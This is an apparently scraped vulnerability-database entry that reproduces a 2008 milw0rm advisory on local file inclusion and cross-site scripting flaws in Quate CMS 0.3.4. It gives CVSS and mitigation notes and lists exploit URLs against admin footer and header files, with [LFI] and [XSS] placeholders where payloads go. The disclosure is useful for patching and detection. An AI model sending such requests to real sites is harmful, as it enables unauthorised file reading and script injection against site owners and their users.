Local File Include

vendor:

Quate CMS

by:

CraCkEr

7.5

CVSS

HIGH

Local File Include

CWE

Product Name: Quate CMS

Affected Version From: Quate CMS 0.3.4

Affected Version To: Quate CMS 0.3.4

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

N/A

Quate CMS 0.3.4 is vulnerable to Local File Include vulnerability. This vulnerability can be exploited by remote attackers to gain system access.

Mitigation:

Disable register globals and use input validation to prevent malicious input from being passed to the application.

Source

Exploit-DB raw data:

???????????????????????????????????????????????????????????????????????????????
??                             C r a C k E r                                ??
??          T H E   C R A C K   O F   E T E R N A L   M I G H T             ??
??????????????????????????????????????????????????????????????????????????????

 ?????      From The Ashes and Dust Rises An Unimaginable crack....      ?????
??????????????????????????????????????????????????????????????????????????????
??               [ Local File Include ] [ XSS ]                             ??
??????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                : :                                    :
?   Group    : N/A                    ? ?                                    ?
?   Script   : Quate CMS 0.3.4        ? ?         Register Globals :         ?
?   Download : quate.net              ? ?                                    ?
?   Method   : GET                    ? ?          [?] ON   [ ] OFF          ?
?   Critical : High [????????]        ? ?                                    ?
?   Impact   : System access          ? ?                                    ?
? ????????????????????????????????????? ???????????????????????????????????? ?
?                              DALnet #crackers                             ??
??????????????????????????????????????????????????????????????????????????????
:                                                                            :
?  Release Notes:                                                            ?
?  ?????????????                                                             ?
?  Typically used for remotely exploitable vulnerabilities that can lead to  ?
?  system compromise.                                                        ?
?                                                                            ?

??????????????????????????????????????????????????????????????????????????????
??                             Exploit URL's                                ??
??????????????????????????????????????????????????????????????????????????????

[LFI]
  
http://localhost/path/admin/includes/footer.php?row_secure[account_theme]=[LFI]
http://localhost/path/admin/includes/footer.php?admin_template_default=[LFI]

[XSS]

http://localhost/path/admin/includes/themes/default/header.php?page_area=[XSS]
http://localhost/path/admin/includes/themes/default/header.php?page_header=[XSS]

   
??????????????????????????????????????????????????????????????????????????????
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .

??????????????????????????????????????????????????????????????????????????????
??                              © CraCkEr 2008                              ??
??????????????????????????????????????????????????????????????????????????????

# milw0rm.com [2008-08-06]